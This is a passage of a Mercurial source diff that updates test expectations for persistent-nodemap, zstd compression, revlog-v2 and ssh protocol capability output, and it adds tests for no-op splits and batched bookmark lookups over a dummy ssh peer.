+ persistent-nodemap: yes yes no (rust !)
copies-sdc: no no no
+ revlog-v2: no no no
plain-cl-delta: yes yes yes
- compression: zlib zlib zlib
+ compression: zlib zlib zlib (no-zstd !)
+ compression: zstd zstd zstd (zstd !)
compression-level: default default default
$ hg debugformat -v -R up-no-side-data --config format.exp-use-side-data=yes
format-variant repo config default
@@ -69,11 +71,13 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: no yes no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: yes yes no (rust !)
copies-sdc: no no no
+ revlog-v2: no yes no
plain-cl-delta: yes yes yes
- compression: zlib zlib zlib
+ compression: zlib zlib zlib (no-zstd !)
+ compression: zstd zstd zstd (zstd !)
compression-level: default default default
$ hg debugupgraderepo -R up-no-side-data --config format.exp-use-side-data=yes > /dev/null
@@ -88,11 +92,13 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: yes no no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: yes yes no (rust !)
copies-sdc: no no no
+ revlog-v2: yes no no
plain-cl-delta: yes yes yes
- compression: zlib zlib zlib
+ compression: zlib zlib zlib (no-zstd !)
+ compression: zstd zstd zstd (zstd !)
compression-level: default default default
$ hg debugformat -v -R up-side-data --config format.exp-use-side-data=no
format-variant repo config default
@@ -101,10 +107,12 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: yes no no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: yes yes no (rust !)
copies-sdc: no no no
+ revlog-v2: yes no no
plain-cl-delta: yes yes yes
- compression: zlib zlib zlib
+ compression: zlib zlib zlib (no-zstd !)
+ compression: zstd zstd zstd (zstd !)
compression-level: default default default
$ hg debugupgraderepo -R up-side-data --config format.exp-use-side-data=no > /dev/null
--- a/tests/test-simplemerge.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-simplemerge.py Tue Apr 20 11:01:06 2021 -0400
@@ -141,8 +141,6 @@
"""No conflicts because nothing changed"""
m3 = Merge3([b'aaa', b'bbb'], [b'aaa', b'bbb'], [b'aaa', b'bbb'])
- self.assertEqual(m3.find_unconflicted(), [(0, 2)])
-
self.assertEqual(
list(m3.find_sync_regions()),
[(0, 2, 0, 2, 0, 2), (2, 2, 2, 2, 2, 2)],
@@ -189,8 +187,6 @@
[b'aaa', b'bbb'], [b'aaa', b'111', b'bbb'], [b'aaa', b'bbb']
)
- self.assertEqual(m3.find_unconflicted(), [(0, 1), (1, 2)])
-
self.assertEqual(
list(m3.find_sync_regions()),
[(0, 1, 0, 1, 0, 1), (1, 2, 2, 3, 1, 2), (2, 2, 3, 3, 2, 2)],
@@ -271,8 +267,6 @@
[b'aaa\n', b'222\n', b'bbb\n'],
)
- self.assertEqual(m3.find_unconflicted(), [(0, 1), (1, 2)])
-
self.assertEqual(
list(m3.find_sync_regions()),
[(0, 1, 0, 1, 0, 1), (1, 2, 2, 3, 2, 3), (2, 2, 3, 3, 3, 3)],
@@ -323,8 +317,6 @@
[b'aaa', b'222', b'bbb'],
)
- self.assertEqual(m3.find_unconflicted(), [(0, 1), (2, 3)])
-
self.assertEqual(
list(m3.find_sync_regions()),
[(0, 1, 0, 1, 0, 1), (2, 3, 2, 3, 2, 3), (3, 3, 3, 3, 3, 3)],
@@ -338,8 +330,6 @@
[b'aaa', b'222', b'222', b'222', b'222', b'bbb'],
)
- self.assertEqual(m3.find_unconflicted(), [(0, 1), (3, 4)])
-
self.assertEqual(
list(m3.find_sync_regions()),
[(0, 1, 0, 1, 0, 1), (3, 4, 4, 5, 5, 6), (4, 4, 5, 5, 6, 6)],
--- a/tests/test-sparse-requirement.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-sparse-requirement.t Tue Apr 20 11:01:06 2021 -0400
@@ -20,6 +20,8 @@
dotencode
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
@@ -38,6 +40,8 @@
exp-sparse
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
@@ -57,6 +61,8 @@
dotencode
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
--- a/tests/test-split.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-split.t Tue Apr 20 11:01:06 2021 -0400
@@ -1046,3 +1046,101 @@
[ ui.warning|rollback completed]
[ ui.error|abort: empty commit message]
[10]
+
+Test that creating an empty split or a "no-op" commit
+(identical to the original) doesn't cause chaos
+--------------------------------------------------
+
+ $ hg init $TESTTMP/noop
+ $ cd $TESTTMP/noop
+ $ echo r0 > r0
+ $ hg ci -qAm r0
+ $ hg phase -p
+ $ echo foo > foo
+ $ hg ci -qAm foo
+ $ hg log -G -T'{phase} {rev}:{node|short} {desc}'
+ @ draft 1:ae694b2901bb foo
+ |
+ o public 0:222799e2f90b r0
+
+ $ printf 'd\na\n' | HGEDITOR=cat hg split || true
+ diff --git a/foo b/foo
+ new file mode 100644
+ examine changes to 'foo'?
+ (enter ? for help) [Ynesfdaq?] d
+
+ no changes to record
+ diff --git a/foo b/foo
+ new file mode 100644
+ examine changes to 'foo'?
+ (enter ? for help) [Ynesfdaq?] a
+
+ HG: Splitting ae694b2901bb. Write commit message for the first split changeset.
+ foo
+
+
+ HG: Enter commit message. Lines beginning with 'HG:' are removed.
+ HG: Leave message empty to abort commit.
+ HG: --
+ HG: user: test
+ HG: branch 'default'
+ HG: added foo
+ warning: commit already existed in the repository!
+ $ hg log -G -T'{phase} {rev}:{node|short} {desc}'
+ @ draft 1:ae694b2901bb foo
+ |
+ o public 0:222799e2f90b r0
+
+
+Now try the same thing, but modify the message so we don't trigger the
+identical-changeset failure
+
+ $ hg init $TESTTMP/noop2
+ $ cd $TESTTMP/noop2
+ $ echo r0 > r0
+ $ hg ci -qAm r0
+ $ hg phase -p
+ $ echo foo > foo
+ $ hg ci -qAm foo
+ $ hg log -G -T'{phase} {rev}:{node|short} {desc}'
+ @ draft 1:ae694b2901bb foo
+ |
+ o public 0:222799e2f90b r0
+
+ $ cat > $TESTTMP/messages <<EOF
+ > message1
+ > EOF
+ $ printf 'd\na\n' | HGEDITOR="\"$PYTHON\" $TESTTMP/editor.py" hg split
+ diff --git a/foo b/foo
+ new file mode 100644
+ examine changes to 'foo'?
+ (enter ? for help) [Ynesfdaq?] d
+
+ no changes to record
+ diff --git a/foo b/foo
+ new file mode 100644
+ examine changes to 'foo'?
+ (enter ? for help) [Ynesfdaq?] a
+
+ EDITOR: HG: Splitting ae694b2901bb. Write commit message for the first split changeset.
+ EDITOR: foo
+ EDITOR:
+ EDITOR:
+ EDITOR: HG: Enter commit message. Lines beginning with 'HG:' are removed.
+ EDITOR: HG: Leave message empty to abort commit.
+ EDITOR: HG: --
+ EDITOR: HG: user: test
+ EDITOR: HG: branch 'default'
+ EDITOR: HG: added foo
+ created new head
+ saved backup bundle to $TESTTMP/noop2/.hg/strip-backup/ae694b2901bb-28e0b457-split.hg (obsstore-off !)
+ $ hg log -G -T'{phase} {rev}:{node|short} {desc}'
+ @ draft 1:de675559d3f9 message1 (obsstore-off !)
+ @ draft 2:de675559d3f9 message1 (obsstore-on !)
+ |
+ o public 0:222799e2f90b r0
+
+#if obsstore-on
+ $ hg debugobsolete
+ ae694b2901bb8b0f8c4b5e075ddec0d63468d57a de675559d3f93ffc822c6eb7490e5c73033f17c7 0 * (glob)
+#endif
--- a/tests/test-sqlitestore.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-sqlitestore.t Tue Apr 20 11:01:06 2021 -0400
@@ -17,6 +17,8 @@
dotencode
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
@@ -31,6 +33,8 @@
exp-sqlite-comp-001=$BUNDLE2_COMPRESSIONS$ (no-zstd !)
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
@@ -49,6 +53,8 @@
exp-sqlite-comp-001=$BUNDLE2_COMPRESSIONS$
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
@@ -62,6 +68,8 @@
exp-sqlite-comp-001=none
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/tests/test-ssh-batch.t Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,15 @@
+ $ hg init a
+ $ cd a
+ $ touch a; hg commit -qAm_
+ $ hg bookmark $(for i in $($TESTDIR/seq.py 0 20); do echo b$i; done)
+ $ hg clone . ../b -q
+ $ cd ../b
+
+Checking that when looking up multiple bookmarks in one go, if one of them
+fails (thus causing the sshpeer to be stopped), the errors from the
+remaining lookups don't result in tracebacks.
+
+ $ hg pull -r b0 -r nosuchbookmark $(for i in $($TESTDIR/seq.py 1 20); do echo -r b$i; done) -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/$(pwd)/../a
+ pulling from ssh://user@dummy/$TESTTMP/b/../a
+ abort: unknown revision 'nosuchbookmark'
+ [255]
--- a/tests/test-ssh-bundle1.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-ssh-bundle1.t Tue Apr 20 11:01:06 2021 -0400
@@ -72,8 +72,10 @@
$ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" --stream ssh://user@dummy/remote local-stream
streaming all changes
- 4 files to transfer, 602 bytes of data
- transferred 602 bytes in * seconds (*) (glob)
+ 4 files to transfer, 602 bytes of data (no-zstd !)
+ transferred 602 bytes in * seconds (*) (glob) (no-zstd !)
+ 4 files to transfer, 621 bytes of data (zstd !)
+ transferred 621 bytes in * seconds (* */sec) (glob) (zstd !)
searching for changes
no changes found
updating to branch default
@@ -94,8 +96,10 @@
$ hg -R local-stream book mybook
$ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" --stream ssh://user@dummy/local-stream stream2
streaming all changes
- 4 files to transfer, 602 bytes of data
- transferred 602 bytes in * seconds (*) (glob)
+ 4 files to transfer, 602 bytes of data (no-zstd !)
+ transferred 602 bytes in * seconds (*) (glob) (no-zstd !)
+ 4 files to transfer, 621 bytes of data (zstd !)
+ transferred 621 bytes in * seconds (* */sec) (glob) (zstd !)
searching for changes
no changes found
updating to branch default
@@ -482,9 +486,11 @@
sending upgrade request: * proto=exp-ssh-v2-0003 (glob) (sshv2 !)
sending hello command
sending between command
- remote: 463 (sshv1 !)
+ remote: 444 (sshv1 no-rust !)
+ remote: 463 (sshv1 rust !)
protocol upgraded to exp-ssh-v2-0003 (sshv2 !)
- remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-rust !)
+ remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,persistent-nodemap,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (rust !)
remote: 1 (sshv1 !)
sending protocaps command
preparing listkeys for "bookmarks"
--- a/tests/test-ssh-proto-unbundle.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-ssh-proto-unbundle.t Tue Apr 20 11:01:06 2021 -0400
@@ -1,3 +1,10 @@
+persistent-nodemap is not enabled by default. It is not relevant for this test, so disable it.
+
+ $ cat << EOF >> $HGRCPATH
+ > [format]
+ > use-persistent-nodemap = no
+ > EOF
+
$ cat > hgrc-sshv2 << EOF
> %include $HGRCPATH
> [experimental]
@@ -56,8 +63,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -109,8 +116,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending unbundle command
@@ -235,8 +242,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -293,8 +300,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending unbundle command
@@ -359,8 +366,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -418,8 +425,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending unbundle command
@@ -485,8 +492,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -543,8 +550,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending unbundle command
@@ -609,8 +616,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -668,8 +675,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending unbundle command
@@ -735,8 +742,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -796,8 +803,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending unbundle command
@@ -865,8 +872,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -923,8 +930,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending unbundle command
@@ -989,8 +996,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -1050,8 +1057,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending unbundle command
@@ -1119,8 +1126,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -1180,8 +1187,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending unbundle command
@@ -1255,8 +1262,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -1314,8 +1321,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending unbundle command
@@ -1382,8 +1389,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -1441,8 +1448,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending unbundle command
@@ -1511,8 +1518,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -1572,8 +1579,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending unbundle command
@@ -1650,8 +1657,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -1715,8 +1722,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending unbundle command
@@ -1788,8 +1795,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -1843,8 +1850,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending unbundle command
@@ -1918,8 +1925,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -1977,8 +1984,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
